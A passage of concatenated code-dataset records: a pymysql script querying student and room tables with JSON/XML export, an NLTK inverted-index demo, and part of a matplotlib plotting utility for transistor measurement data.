YEAR(students.birthday))\n LIMIT 5\"\"\"\n\n return execute_query(query_string, cursor)\n\n\n@timing\ndef get_five_biggest_rooms_with_age_difference(cursor):\n \"\"\" Select top 5 rooms with the biggest age difference among students \"\"\"\n\n query_string = \"\"\"SELECT rooms.name as 'The room number', CAST((MAX(YEAR(NOW()) - YEAR(students.birthday)))\n - (MIN(YEAR(NOW()) - YEAR(students.birthday))) as float) as 'The biggest age difference' \n FROM rooms INNER JOIN students ON rooms.room_id = students.room_id \n GROUP BY rooms.name \n ORDER BY (MAX(YEAR(NOW()) - YEAR(students.birthday))) - \n (MIN(YEAR(NOW()) - YEAR(students.birthday))) DESC \n LIMIT 5\"\"\"\n\n return execute_query(query_string, cursor)\n\n\n@timing\ndef get_rooms_with_different_sex_of_students(cursor):\n \"\"\" Select list of rooms where students of different sexes live\"\"\"\n\n query_string = \"\"\"SELECT room_id\n FROM STUDENTS \n GROUP BY room_id \n HAVING COUNT(DISTINCT sex) > 1 \"\"\"\n\n res_query_4 = execute_query(query_string, cursor)\n\n res_4 = []\n\n for room in res_query_4:\n res_4.append(\"Room \" + str(room['room_id'] - 1))\n return res_4\n\n\ndef do_task_work(file_students, file_rooms, format):\n try:\n connection = pymysql.connect(\n host=local_host,\n port=3306,\n user=user,\n password=password,\n database=db_name,\n cursorclass=pymysql.cursors.DictCursor\n )\n print(\"successfully connected...\")\n\n try:\n with connection.cursor() as cursor:\n recreate_table_if_needed(cursor)\n\n rooms = load_rooms_into_table_from_file(file_rooms, cursor, connection)\n students = load_students_into_table_from_file(file_students, cursor, connection)\n\n # Getting tasks results\n task_query_result1 = get_rooms_students_count(cursor)\n task_query_result2 = get_five_smallest_age_rooms(cursor)\n task_query_result3 = get_five_biggest_rooms_with_age_difference(cursor)\n task_query_result4 = get_rooms_with_different_sex_of_students(cursor)\n\n # adding tasks results to JSON\n json_result = {}\n json_result['task1_result'] = task_query_result1\n json_result['task2_result'] = task_query_result2\n json_result['task3_result'] = task_query_result3\n json_result['task4_result'] = task_query_result4\n\n # Determining file format and the data that we need to write to file\n results_file_name = \"\"\n data_to_write = None\n data_in_json = json.dumps(json_result, indent=4)\n\n format_lower = format.lower()\n if format_lower == \"json\":\n # if format is JSON - then just write it\n results_file_name = \"results.json\"\n data_to_write = data_in_json\n elif format_lower == \"xml\":\n # if format is XML then convert JSON result to XML\n data_in_xml = readfromstring(data_in_json)\n data_to_write = json2xml.Json2xml(data_in_xml).to_xml()\n results_file_name = \"results.xml\"\n\n # Writing results to JSON or XML file\n with open(results_file_name, \"w\", encoding=\"utf8\") as write_file:\n write_file.write(data_to_write)\n\n print(\"successfully\")\n\n finally:\n connection.close()\n\n except Exception as e:\n print(\"Connection refused\")\n print(e)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Convert json to json or xml\")\n parser.add_argument(\"-r\", help=\"Path to JSON file with rooms\")\n parser.add_argument(\"-s\", help=\"Path to JSON file with students\")\n parser.add_argument(\"-f\", help=\"Format for the output file JSON or XML\")\n args = parser.parse_args()\n\n do_task_work(args.s, args.r, 
args.f)\n","repo_name":"murkins/LeverX-task-3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70446435442","text":"import numpy as np\nimport nltk\nfrom nltk.tokenize import word_tokenize,sent_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nfrom tabulate import tabulate\nnltk.download('punkt')\nnltk.download('stopwords')\nps = PorterStemmer()\nstop_words = set(stopwords.words(\"english\"))\n\ndoc1 = \"The cat in the hat\"\ndoc2 = \"The cat sat on the mat\"\ndoc3 = \"The dog ate my homework\"\ndoc4 = \"I hate cats and dogs\"\n\ntoken1 = word_tokenize(doc1)\ntoken2 = word_tokenize(doc2)\ntoken3 = word_tokenize(doc3)\ntoken4 = word_tokenize(doc4)\n\nterm=token1+token2+token3+token4\n\nStemmingone = []\nStemmingtwo = []\nStemmingthree = []\nStemmingfour = []\nfor x in token1:\n    Stemmingone.append(ps.stem(x))\nfor y in token2:\n    Stemmingtwo.append(ps.stem(y))\nfor z in token3:\n    Stemmingthree.append(ps.stem(z))\nfor m in token4:\n    Stemmingfour.append(ps.stem(m))\n\nRemove_stopWordsone = []\nRemove_stopWordstwo = []\nRemove_stopWordsthree = []\nRemove_stopWordsfour = []\nfor i in Stemmingone:\n    if i not in stop_words:\n        Remove_stopWordsone.append(i)\nfor i in Stemmingtwo:\n    if i not in stop_words:\n        Remove_stopWordstwo.append(i)\nfor i in Stemmingthree:\n    if i not in stop_words:\n        Remove_stopWordsthree.append(i)\nfor i in Stemmingfour:\n    if i not in stop_words:\n        Remove_stopWordsfour.append(i)\n\n\nLowerCaseone = []\nLowerCasetwo = []\nLowerCasethree = []\nLowerCasefour = []\nfor i in Remove_stopWordsone :\n    LowerCaseone.append(i.lower())\nfor i in Remove_stopWordstwo :\n    LowerCasetwo.append(i.lower())\nfor i in Remove_stopWordsthree :\n    LowerCasethree.append(i.lower())\nfor i in Remove_stopWordsfour :\n    LowerCasefour.append(i.lower())\n\nLowerCase = []\nfor i in term :\n    LowerCase.append(i.lower())\n\nRemove_stopWords = []\nfor i in LowerCase:\n    if i not in stop_words:\n        Remove_stopWords.append(i)\n\n\nStemming = []\nfor w in Remove_stopWords:\n    Stemming.append(ps.stem(w))\n\n\nUnique_elements= set(Stemming)\nUnique_elements_sort = sorted(Unique_elements)\n\n\ninverted_index = {}\ncount=0\nfor i, doc in enumerate(Unique_elements_sort):\n    for term in doc.split():\n        if term in inverted_index:\n            inverted_index[term].add(i)\n\n        else: inverted_index[term] = {i}\n\n\ncount = 0\nsave = []\nfrequency = []\nposting_list = []\nfor x in inverted_index:\n    count=0\n    save.append(x)\n    frequency.append(x)\n    for y in LowerCaseone:\n        if x==y:\n            count+=1\n    if x in LowerCaseone:\n        save.append(\"Doc: (1)\")\n    for z in LowerCasetwo:\n        if x==z:\n            count+=1\n    if x in LowerCasetwo:\n        save.append(\"Doc: (2)\")\n    for m in LowerCasethree:\n        if x==m:\n            count+=1\n    if x in LowerCasethree:\n        save.append(\"Doc: (3)\")\n    for n in LowerCasefour:\n        if x==n:\n            count+=1\n    if x in LowerCasefour:\n        save.append(\"Doc: (4)\")\n    frequency.append(\"Frequency : \" +str(count))\n\nprint(\"The Word : .....\" + \"The Frequency : ....\")\nprint()\nprint()\nfor u in frequency:\n    print(u)\n    print(\"--\")\nprint()\nprint(\"-----(Posting List)----\")\nprint()\nprint(\"The Word : .....\" + \"The Doc ID : ....\")\nprint()\nfor t in save:\n    print(t)\n    
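# '--' is printed as a separator between posting-list entries\n    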
print(\"--\")\n#print(tabulate(save))\n\n","repo_name":"TheMostafax/Inverted_Index-using-python","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"21016557766","text":"\"\"\"A utility designed to help with the creation a plots with matplotlib that all use a consistent style.\"\"\"\n\nimport matplotlib\nimport os\nimport sys\n\nif('ipykernel_launcher' in sys.argv[0]):\n\tpass\nelse:\n\tmatplotlib.use('agg')\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib import colors as pltc\nfrom matplotlib import cm\nimport numpy as np\nimport io\nimport time\n\nfrom utilities import FET_Modeling as fet_model\nfrom utilities import SequenceGeneratorUtility as dgu\n\n\n# ********** Matplotlib Parameters **********\n\nplt.style.use('seaborn-paper')\n\n# plt.rcParams['mathtext.fontset'] = 'custom'\n# plt.rcParams['mathtext.rm'] = 'Arial'\n# plt.rcParams['mathtext.it'] = 'Arial'\n# plt.rcParams['mathtext.bf'] = 'Arial:bold'\n\n# plt.rcParams[\"font.family\"] = 'Times New Roman'\n# plt.rcParams['mathtext.rm'] = 'Times New Roman'\n# plt.rcParams['mathtext.it'] = 'Times New Roman'\n# plt.rcParams['mathtext.bf'] = 'Times New Roman'\n\n# Used for the DRC Abstract\nplt.rcParams['axes.labelsize'] = 12\nplt.rcParams['axes.titlesize'] = 12\nplt.rcParams['legend.fontsize'] = 8\nplt.rcParams['xtick.labelsize'] = 8\nplt.rcParams['ytick.labelsize'] = 8\nplt.rcParams['font.size'] = 8\n\n# Minimum Sizes based on Dr. Franklin's Publications (Body text is 10 pt)\nplt.rcParams['axes.labelsize'] = 6\nplt.rcParams['axes.titlesize'] = 6\nplt.rcParams['legend.fontsize'] = 4.5\nplt.rcParams['xtick.labelsize'] = 4.5\nplt.rcParams['ytick.labelsize'] = 4.5\nplt.rcParams['font.size'] = 4.5\n\n# Sizes based on Nature Nanotechnology (Body text is 9 pt)\nplt.rcParams['axes.labelsize'] = 7\nplt.rcParams['axes.titlesize'] = 7\nplt.rcParams['legend.fontsize'] = 7\nplt.rcParams['xtick.labelsize'] = 7\nplt.rcParams['ytick.labelsize'] = 7\nplt.rcParams['font.size'] = 7\n\n# Steven's preferences loosely based on Nature Nanotechnology (Body text is 9 pt)\nplt.rcParams['axes.labelsize'] = 7\nplt.rcParams['axes.titlesize'] = 7\nplt.rcParams['legend.fontsize'] = 6\nplt.rcParams['xtick.labelsize'] = 6\nplt.rcParams['ytick.labelsize'] = 6\nplt.rcParams['font.size'] = 6\n\ntry:\n\tplt.rcParams[\"legend.title_fontsize\"] = 6\nexcept:\n\t# this is new in Matplotlib version 3.0\n\tpass\n\nplt.rcParams['axes.labelpad'] = 0\nplt.rcParams['axes.titlepad'] = 6\nplt.rcParams['ytick.major.pad'] = 2\nplt.rcParams['xtick.major.pad'] = 2\n\nplt.rcParams['figure.figsize'] = [8,6]\nplt.rcParams['figure.titlesize'] = 8\nplt.rcParams['axes.formatter.use_mathtext'] = True\nplt.rcParams['axes.formatter.useoffset'] = False\nplt.rcParams['xtick.top'] = True\nplt.rcParams['ytick.right'] = True\nplt.rcParams['xtick.direction'] = 'in'\nplt.rcParams['ytick.direction'] = 'in'\nplt.rcParams['axes.axisbelow'] = False\n# plt.rcParams['figure.autolayout'] = True\n\nplt.rcParams['axes.linewidth'] = 0.5\nplt.rcParams['xtick.major.width'] = 0.5\nplt.rcParams['ytick.major.width'] = 0.5\nplt.rcParams['xtick.major.size'] = 3\nplt.rcParams['ytick.major.size'] = 3\n\nplt.rcParams['xtick.minor.width'] = 0.5\nplt.rcParams['ytick.minor.width'] = 0.5\nplt.rcParams['xtick.minor.size'] = 1\nplt.rcParams['ytick.minor.size'] = 1\n\nplt.rcParams['axes.formatter.limits'] = [-2, 4]\n\n# Change to Type 2/TrueType fonts (editable 
text)\nplt.rcParams['pdf.fonttype'] = 42\nplt.rcParams['ps.fonttype'] = 42\n\n# Add custom color-maps\nlight_to_dark_map = lambda R, G, B: dict({'red':((0.0, 0/255, 0/255), (0.5, R/255, R/255), (1.0, 255/255, 255/255)), 'green':((0.0, 0/255, 0/255), (0.5, G/255, G/255), (1.0, 255/255, 255/255)), 'blue':((0.0, 0/255, 0/255), (0.5, B/255, B/255), (1.0, 255/255, 255/255))})\ndark_to_light_map = lambda R, G, B: dict({'red':((0.0, 255/255, 255/255), (0.5, R/255, R/255), (1.0, 0/255, 0/255)), 'green':((0.0, 255/255, 255/255), (0.5, G/255, G/255), (1.0, 0/255, 0/255)), 'blue':((0.0, 255/255, 255/255), (0.5, B/255, B/255), (1.0, 0/255, 0/255))})\ncolor_to_color_map = lambda R1, G1, B1, R2, G2, B2: dict({'red':((0.0, R1/255, R1/255), (0.5, 0.5*(R1+R2)/255, 0.5*(R1+R2)/255), (1.0, R2/255, R2/255)), 'green':((0.0, G1/255, G1/255), (0.5, 0.5*(G1+G2)/255, 0.5*(G1+G2)/255), (1.0, G2/255, G2/255)), 'blue':((0.0, B1/255, B1/255), (0.5, 0.5*(B1+B2)/255, 0.5*(B1+B2)/255), (1.0, B2/255, B2/255))})\ncolor_to_color_to_color_map = lambda R1, G1, B1, R2, G2, B2, R3, G3, B3: dict({'red':((0.0, R1/255, R1/255), (0.5, R2/255, R2/255), (1.0, R3/255, R3/255)), 'green':((0.0, G1/255, G1/255), (0.5, G2/255, G2/255), (1.0, G3/255, G3/255)), 'blue':((0.0, B1/255, B1/255), (0.5, B2/255, B2/255), (1.0, B3/255, B3/255))})\n\ndef rgba_to_rgba_map(RGBA1, RGBA2):\n\tR1, G1, B1, A1 = RGBA1\n\tR2, G2, B2, A2 = RGBA2\n\n\tdescription = dict({\n\t\t'red':((0.0, R1/255, R1/255), (0.5, 0.5*(R1+R2)/255, 0.5*(R1+R2)/255), (1.0, R2/255, R2/255)),\n\t\t'green':((0.0, G1/255, G1/255), (0.5, 0.5*(G1+G2)/255, 0.5*(G1+G2)/255), (1.0, G2/255, G2/255)),\n\t\t'blue':((0.0, B1/255, B1/255), (0.5, 0.5*(B1+B2)/255, 0.5*(B1+B2)/255), (1.0, B2/255, B2/255)),\n\t\t'alpha':((0.0, A1/255, A1/255), (0.5, 0.5*(A1+A2)/255, 0.5*(A1+A2)/255), (1.0, A2/255, A2/255))\n\t})\n\tname = 'rgba_to_rgba_map' + ''.join([str(c) for c in [R1, G1, B1, A1, R2, G2, B2, A2]])\n\n\treturn pltc.LinearSegmentedColormap(name, description)\n\n# RGB\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_red_black', light_to_dark_map(237, 85, 59) ))\t\t#ed553b\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_green_black', light_to_dark_map(79, 185, 159) ))\t\t#4FB99F\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_blue_black', light_to_dark_map(31, 119, 180) ))\t\t#1f77b4\n\n# RGB - secondary\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_yellow_black', light_to_dark_map(242, 177, 52) ))\t#f2b134\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_purple_black', light_to_dark_map(115, 99, 175) ))\t#7363af\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_orange_black', light_to_dark_map(238, 117, 57) ))\t#ee7539\n\n# RGB - tertiary\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_maroon_black', light_to_dark_map(128, 0, 0) ))\t\t#800000\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_violet_black', light_to_dark_map(53, 25, 150) ))\t\t#351996\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_turquoise_black', light_to_dark_map(64, 224, 208) ))\t#40E0D0\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_teal_black', light_to_dark_map(28, 206, 167) ))\t\t#1ccea7\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_lime_black', light_to_dark_map(58, 226, 75) ))\t\t#3ae24b\n\n# Other\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_magenta_black', light_to_dark_map(159, 50, 133) ))\t#9F3285\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_peach_black', 
light_to_dark_map(255, 142, 101) ))\t#ff8e65\n\n# Multi-colored\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('blue_teal_orange', color_to_color_to_color_map(10, 30, 150, 100, 175, 170, 250, 200, 100) ))\n\n\n\n# === Matplotlib Access ===\ndef getPlt():\n\treturn plt\n\ndef show():\n\tprint('Showing plots from matplotlib.')\n\tplt.show()\n\n\n\n# *********** Plot Helper Functions ***********\n\"\"\"Every method in this utility is intended to assist the creation of new plotDefintions in the plotDefinitions folder.\"\"\"\n\n# === Device Plots ===\ndef extractSweep(axis, jsonData, direction='both', x_data='gate voltage', y_data='drain current', scaleYaxisBy=1, derivative=False, absoluteValue=False, reciprocal=False, logScale=False):\n\tdata_save_names = {\n\t\t'gate voltage': 'vgs_data',\n\t\t'drain voltage': 'vds_data',\n\t\t'gate current': 'ig_data',\n\t\t'drain current': 'id_data',\n\n\t\t'input voltage': 'vin_data',\n\t\t'output voltage': 'vout_data',\n\t\t'input current': 'iin_data',\n\t\t'output current': 'iout_data',\n\n\t\t'gate voltage for snr':'vgs_data_to_plot',\n\t\t'snr':'snr_to_plot'\n\t}\n\n\tx_data = data_save_names[x_data]\n\tx = list(jsonData['Results'][x_data])\n\n\ty_data = data_save_names[y_data]\n\ty = list(jsonData['Results'][y_data])\n\n\t# Figure out if data was collected with multiple points per x-value\n\tpointsPerX = 1\n\ttry:\n\t\tif(x_data == 'vgs_data'):\n\t\t\tpointsPerX = jsonData['runConfigs']['GateSweep']['pointsPerVGS']\n\t\telif(x_data == 'vds_data'):\n\t\t\tpointsPerX = jsonData['runConfigs']['DrainSweep']['pointsPerVDS']\n\t\telif(x_data == 'vin_data'):\n\t\t\tpointsPerX = jsonData['runConfigs']['InverterSweep']['pointsPerVIN']\n\texcept:\n\t\tpointsPerX = 1\n\n\t# Plot only forward or reverse sweeps of the data (also backwards compatible to old format)\n\tif(direction == 'forward'):\n\t\tforward_x = []\n\t\tforward_y = []\n\t\tfor i in [j for j in range(len(x)) if(j % 2 == 0)]:\n\t\t\tforward_x.append(x[i])\n\t\t\tforward_y.append(y[i])\n\t\tx = forward_x\n\t\ty = forward_y\n\telif(direction == 'reverse'):\n\t\treverse_x = []\n\t\treverse_y = []\n\t\tfor i in [j for j in range(len(x)) if(j % 2 == 1)]:\n\t\t\treverse_x.append(x[i])\n\t\t\treverse_y.append(y[i])\n\t\tx = reverse_x\n\t\ty = reverse_y\n\n\t# Convert x and y to list-of-list form for consistency across all possible data formats\n\tif(not isinstance(x[0], list)):\n\t\tx = [x]\n\t\ty = [y]\n\n\t# Take absolute value of y-data if showing on log scale\n\tif(logScale):\n\t\ty = np.abs(y)\n\n\t# If desired, can calculate the derivative of y with respect to x at each point and plot this instead\n\tif(derivative):\n\t\tdy_dx = []\n\t\tfor i in range(len(x)):\n\t\t\tx_segment = x[i]\n\t\t\ty_segment = y[i] if(not logScale) else (np.log10(y[i]))\n\t\t\t\n\t\t\t# Take the derivative over a window that scales with size of the data (and is >3)\n\t\t\tderivative_fit_length = int(3 + 2*int(len(x_segment)/20))\n\t\t\tN = int(derivative_fit_length/2)\n\t\t\t\n\t\t\t#dy_dx_segment = [(y_segment[j+N] - y_segment[j-N])/(x_segment[j+N] - x_segment[j-N]) for j in range(N, len(x_segment) - N)]\n\t\t\tdy_dx_segment = [linearFit(x_segment[j-N:j+N+1],y_segment[j-N:j+N+1])['slope'] for j in range(N, len(x_segment) - N)]\n\t\t\t\n\t\t\t# Trim x to match the dimensions of dy/dx\n\t\t\tx[i] = x_segment[N:-N]\n\t\t\tdy_dx.append(dy_dx_segment)\n\t\ty = dy_dx\n\n\t# If desired, calculate 1/data\t\n\tif(reciprocal):\n\t\ty = np.reciprocal(y)\n\n\t# If desired, force data to be all positive 
values\n\tif(absoluteValue):\n\t\ty = np.abs(y)\n\t\n\tif(isinstance(scaleYaxisBy, str)):\n\t\tscaleYaxisBy = jsonData['runConfigs'][jsonData['runType']][scaleYaxisBy]\n\t\t\n\t# Scale the data by a given factor\n\ty = np.array(y)*scaleYaxisBy\n\n\treturn (x, y, pointsPerX)\n\ndef plotAll(axis, x_list, y_list, lineColor, lineStyle=None, pointsPerX=1, errorBars=True, alpha=1):\n\t# Iterate through segments of x and y\n\tfor i in range(len(x_list)):\n\t\t# data contains multiple y-values per x-value\n\t\tif(pointsPerX > 1):\n\t\t\tline = plotWithErrorBars(axis, x_list[i], y_list[i], lineColor, pointsPerX, errorBars=errorBars)\n\t\telse:\n\t\t\tif(lineStyle == ''):\n\t\t\t\tline = axis.plot(x_list[i], y_list[i], color=lineColor, marker='o', markersize=2, linewidth=0, alpha=(alpha if(i >= len(x_list)-2) else 0.25))[0]\n\t\t\telse:\n\t\t\t\tline = axis.plot(x_list[i], y_list[i], color=lineColor, marker='o', markersize=2, linewidth=1, alpha=(alpha if(i >= len(x_list)-2) else 0.25), linestyle=lineStyle)[0]\n\treturn line\n\ndef plotSNR(axis, jsonData, lineColor, direction='both', scaleCurrentBy=1, lineStyle=None, errorBars=True):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction='both', x_data='gate voltage for snr', y_data='snr', scaleYaxisBy=scaleCurrentBy)\n\tline = plotAll(axis, x, y, lineColor, lineStyle=lineStyle, pointsPerX=pointsPerX, errorBars=errorBars)\n\treturn line\n\t\n\ndef plotNoiseAxis(axis, x, y, lineColor, lineStyle=None):\n\taxis2 = axis.twinx()\n\t# Iterate through segments of x and y\n\tfor i in range(len(x)):\n\t\tif(lineStyle == ''):\n\t\t\tline2 = axis2.plot(x[i], y[i], color=lineColor, marker='o', markersize=2, linewidth=0, alpha=(1 if(i >= len(x)-2) else 0.25))[0]\n\t\telse:\n\t\t\tline2 = axis2.plot(x[i], y[i], color=lineColor, marker='o', markersize=2, linewidth=1, alpha=(1 if(i >= len(x)-2) else 0.25), linestyle=lineStyle)[0]\n\treturn axis2, line2\n\ndef plotSubthresholdCurve(axis, jsonData, lineColor, direction='both', lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='gate voltage', y_data='drain current', scaleYaxisBy=1, absoluteValue=True)\n\taxis.set_yscale('log')\n\tline = plotAll(axis, x, y, lineColor, lineStyle=lineStyle, pointsPerX=pointsPerX, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotTransferCurve(axis, jsonData, lineColor, direction='both', scaleYaxisBy=1, lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='gate voltage', y_data='drain current', scaleYaxisBy=scaleYaxisBy)\n\tline = plotAll(axis, x, y, lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotGateCurrent(axis, jsonData, lineColor, direction='both', scaleYaxisBy=1, lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='gate voltage', y_data='gate current', scaleYaxisBy=scaleYaxisBy)\n\tline = plotAll(axis, x, y, lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotTransferResistanceCurve(axis, jsonData, lineColor, direction='both', scaleYaxisBy=1, lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='gate voltage', y_data='drain current', scaleYaxisBy='drainVoltageSetPoint', absoluteValue=True, reciprocal=True)\n\ty = scaleYaxisBy*np.array(y)\n\ty = np.abs(y)\n\taxis.set_yscale('log')\n\tline = plotAll(axis, x, y, 
lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotOutputCurve(axis, jsonData, lineColor, direction='both', scaleYaxisBy=1, lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='drain voltage', y_data='drain current', scaleYaxisBy=scaleYaxisBy)\n\tline = plotAll(axis, x, y, lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotOutputGateCurrent(axis, jsonData, lineColor, direction='both', scaleYaxisBy=1, lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='drain voltage', y_data='gate current', scaleYaxisBy=scaleYaxisBy)\n\tline = plotAll(axis, x, y, lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotResistanceCurve(axis, jsonData, lineColor, direction='both', scaleYaxisBy=1, lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='drain voltage', y_data='drain current', scaleYaxisBy=1)\n\ty = scaleYaxisBy * np.array(x) / np.array(y)\n\tresolution_limit_volts = 1e-6\n\ty = [[y[i][j] for j in range(len(y[i])) if(abs(x[i][j]) > resolution_limit_volts)] for i in range(len(y))]\n\tx = [[x[i][j] for j in range(len(x[i])) if(abs(x[i][j]) > resolution_limit_volts)] for i in range(len(x))]\n\tline = plotAll(axis, x, y, lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotFourPointResistanceCurve(axis, jsonData, lineColor, direction='both', scaleYaxisBy=1, lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='drain current', y_data='drain voltage', scaleYaxisBy=1)\n\tresolution_limit_volts = 1e-6\n\ty = [[y[i][j] for j in range(len(y[i])) if(abs(y[i][j]) > resolution_limit_volts)] for i in range(len(y))]\n\tx = [[x[i][j] for j in range(len(x[i])) if(abs(y[i][j]) > resolution_limit_volts)] for i in range(len(x))]\n\ty = scaleYaxisBy * np.array(y) / np.array(x)\n\tline = plotAll(axis, x, y, lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotFourPointVoltageCurve(axis, jsonData, lineColor, direction='both', scaleYaxisBy=1, lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='drain current', y_data='drain voltage', scaleYaxisBy=scaleYaxisBy)\n\t#axis.set_xscale('log')\n\tline = plotAll(axis, x, y, lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotOutputResistanceCurve(axis, jsonData, lineColor, direction='both', scaleYaxisBy=1, lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='drain voltage', y_data='drain current', scaleYaxisBy=scaleYaxisBy, derivative=True, absoluteValue=True, reciprocal=True)\n\ty = np.abs(y)\n\taxis.set_yscale('log')\n\tline = plotAll(axis, x, y, lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotBurnOut(axis1, axis2, axis3, jsonData, lineColor, lineStyle=None, annotate=False, annotation='', plotLine1=True, plotLine2=True, plotLine3=True):\n\tline1, line2, line3 = None, None, None\n\tif(plotLine1):\n\t\tline1 = axis1.plot(jsonData['Results']['vds_data'], 
(np.array(jsonData['Results']['id_data'])*10**6), color=lineColor, linestyle=lineStyle)[0]\n\n\t# Add burn threshold annotation\n\tif(annotate):\n\t\tcurrentThreshold = np.percentile(np.array(jsonData['Results']['id_data']), 90) * jsonData['runConfigs']['BurnOut']['thresholdProportion'] * 10**6\n\t\taxis1.plot([0, jsonData['Results']['vds_data'][-1]], [currentThreshold, currentThreshold], color=lineColor, linestyle='--', linewidth=1)\n\t\taxis1.annotate(annotation, xy=(0, currentThreshold), xycoords='data', horizontalalignment='left', verticalalignment='bottom', color=lineColor)\n\n\tif(plotLine2):\n\t\tline2 = plotOverTime(axis2, jsonData['Results']['timestamps'], (np.array(jsonData['Results']['id_data'])*10**6), lineColor)\n\tif(plotLine3):\n\t\tline3 = plotOverTime(axis3, jsonData['Results']['timestamps'], jsonData['Results']['vds_data'], lineColor)\n\treturn (line1, line2, line3)\n\ndef plotStaticBias(axis, jsonData, lineColor, timeOffset, y_data='id_data', scaleYaxisBy=1e6, timescale='seconds', lineStyle=None, gradient=False, gradientColors=None):\n\tline = plotOverTime(axis, jsonData['Results']['timestamps'], (np.array(jsonData['Results'][y_data]) * scaleYaxisBy), lineColor, offset=timeOffset, markerSize=1.5, lineWidth=0.5, plotInnerGradient=gradient, innerGradientColors=gradientColors)\n\treturn line\n\ndef plotInverterVTC(axis, jsonData, lineColor, direction='both', lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='input voltage', y_data='output voltage', scaleYaxisBy=1)\n\tline = plotAll(axis, x, y, lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotInverterGain(axis, jsonData, lineColor, direction='both', lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='input voltage', y_data='output voltage', scaleYaxisBy=1, derivative=True, absoluteValue=True)\n\tline = plotAll(axis, x, y, lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotTransferCurveSlope(axis, jsonData, lineColor, direction='both', scaleYaxisBy=1, lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='gate voltage', y_data='drain current', scaleYaxisBy=scaleYaxisBy, derivative=True, absoluteValue=True)\n\tline = plotAll(axis, x, y, lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotSubthresholdCurveSlope(axis, jsonData, lineColor, direction='both', x_axis='gate voltage', absoluteXaxis=False, scaleYaxisBy=1, lineStyle=None, errorBars=True, alpha=1):\n\tx1, y1, pointsPerX1 = extractSweep(axis, jsonData, direction, x_data='gate voltage', y_data='drain current', scaleYaxisBy=1000, derivative=True, absoluteValue=True, reciprocal=True, logScale=True)\n\tx2, y2, pointsPerX2 = extractSweep(axis, jsonData, direction, x_data=x_axis, \t\t y_data='drain current', derivative=True)\n\tx2 = np.abs(x2) if(absoluteXaxis) else (x2)\n\ty1 = scaleYaxisBy*np.array(y1)\n\tline = plotAll(axis, x2, y1, lineColor, pointsPerX=pointsPerX1, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\t\ndef plotHysteresisCurve(axis, jsonData, lineColor, scaleYaxisBy=1, lineStyle=None, errorBars=True):\n\tx, y, 